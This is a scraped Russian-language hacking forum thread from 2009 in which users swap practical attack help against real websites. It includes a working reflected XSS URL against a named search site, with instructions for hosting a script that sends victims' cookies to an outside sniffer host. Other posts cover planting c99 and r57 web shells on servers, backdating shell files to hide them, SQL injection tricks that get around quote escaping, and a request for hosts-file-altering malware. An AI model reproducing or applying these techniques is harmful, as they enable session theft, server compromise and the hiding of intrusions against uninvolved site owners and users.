Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Jazz

    Jazz Elder - Старейшина

    Joined:
    27 Sep 2008
    Messages:
    80
    Likes Received:
    2
    Reputations:
    -1
    есть у когонибудь файлы вируса который правит этот файл -"C:\WINDOWS\system32\drivers\etc\hosts" если не трудно скинте ссылку где скачать можно...или как самому написать такой... вобщем интересует всё по этой теме...буду рад любой помощи...
     
  2. Cehennem

    Cehennem Banned

    Joined:
    3 Jun 2009
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    PHP:
    http://m.myrambler.ru/search.php?pagelen=10&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Вот это работает.

    А когда ставлю ссылку из сниффера, тогда не работает.

    mailbrush прав, если значение поисков нету тогда и xss нету, дело в том что в значениях поиска нет ссылки из сниффера, а раза "><script>alert('xss')</script> есть, поэтому xss как "><script>alert('xss')</script> действует, а ссылка из сниффера не действует,
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если я напишу Google, выдача поиска будет, но XSS нет. А если же
    Code:
    google "><script>img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;</script> 
    не будет выдачи, т.к. поиск ничего не найдет. И опять советуешь не проверяя... Оператора OR нету в рамблере, и при чем здесь яша? В коде + нужен как плюс, а не пробел! Ты конкатезируешь
    Code:
    http://httpz.ru/ndemo.gif?
    и куки.

    Cehennem, зарегай себе хост, к примеру sdagsfhfh.ru, залей файлик script.js по адресу
    Code:
    http://sdagsfhfh.ru/script.js
    с содержанием
    Code:
    img = new Image(); 
    img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;
    Дальше заходи
    Code:
    http://m.myrambler.ru/search.php?pagelen=10&query="><script src="http://sdagsfhfh.ru/script.js"></script>
    Потом на сниффер :) И ты увидишь стыренные куки...
     
    2 people like this.
  4. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    У меня вопросик. есть сайтик...открыт 88 порт. там открыты две дерриктория одна админка...во второй фаил httacces - читаемый. можно туда шшел впарить. За ссылкой сайта пишите в личку.
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это обычный листинг.
    Ничего не сделаешь.
     
  6. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Понятно =) спасибо успокоил )
     
  7. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Code:
    *6AA4CFC00B1D328F27C6DEF46C4E3CBD30925B97
     
    3 people like this.
  8. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    за какие приделы? откуда выйти? разъясняй понятней.
     
  9. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    он видимо имеет ввиду хедеры) да?)
     
  10. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    вопрос такой,как выставить дату заливки шелла?
     
  11. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    http://ru.php.net/touch
     
    1 person likes this.
  12. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    del
     
    #8752 Zitt, 6 Sep 2009
    Last edited: 9 Sep 2009
  13. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    такая беда,залил шелл, сервер : 2003 + wampserver,но файлы шелл (с99) заливать не хочет выбивает и все,на линусах некторых тоже такая фигня поскакивает, не буду же каждый раз я через админку все грузить,какие причины этого? спасибо!
     
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    причины:
    1 - Не с99 единым...
    2 - Есть еще "создать файл"
    3 - права на запись есть?
     
  15. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Можно ли как-то использовать LIKE в инъекции, если кавычки экранируются? БД MySQL.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    LIKE+CHAR(37,112,37)
    LIKE+0x257025
     
    1 person likes this.
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    просто может быть причина в том что он закодирован и как то этим фильтруется, поэтому в инете есть куча шеллов не кодированых, пробуй их
     
    _________________________
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ээээ ?

    "закодирован и как то этим фильтруется" -- что это должно означать?

    Чем "этим" и кто "он" фильтруется, и как по причине "закодирования" может не работать заливка файлов?
     
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    я не знаю ,но на один серв когда я лил ,с99, то он у меня не лился, сам не понимал что да как , а когда залил не закодированный шелл то он залился
     
    _________________________
  20. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    На винде есть прова на чтение запись практиски куда угодно,а вод под никсом одним и r57 не аплоадит,там сборка 1 апреля этого года,вообще не знаю чего думать,перепробовал все папки где есть прова (копи-пастил его) и пофик :confused:
    p.s создать файл не катит,их надо больше штуки содавать
    это бывает когда ты льешь с подменой расширения
     
    #8760 Shadrin, 6 Sep 2009
    Last edited: 6 Sep 2009
Thread Status:
Not open for further replies.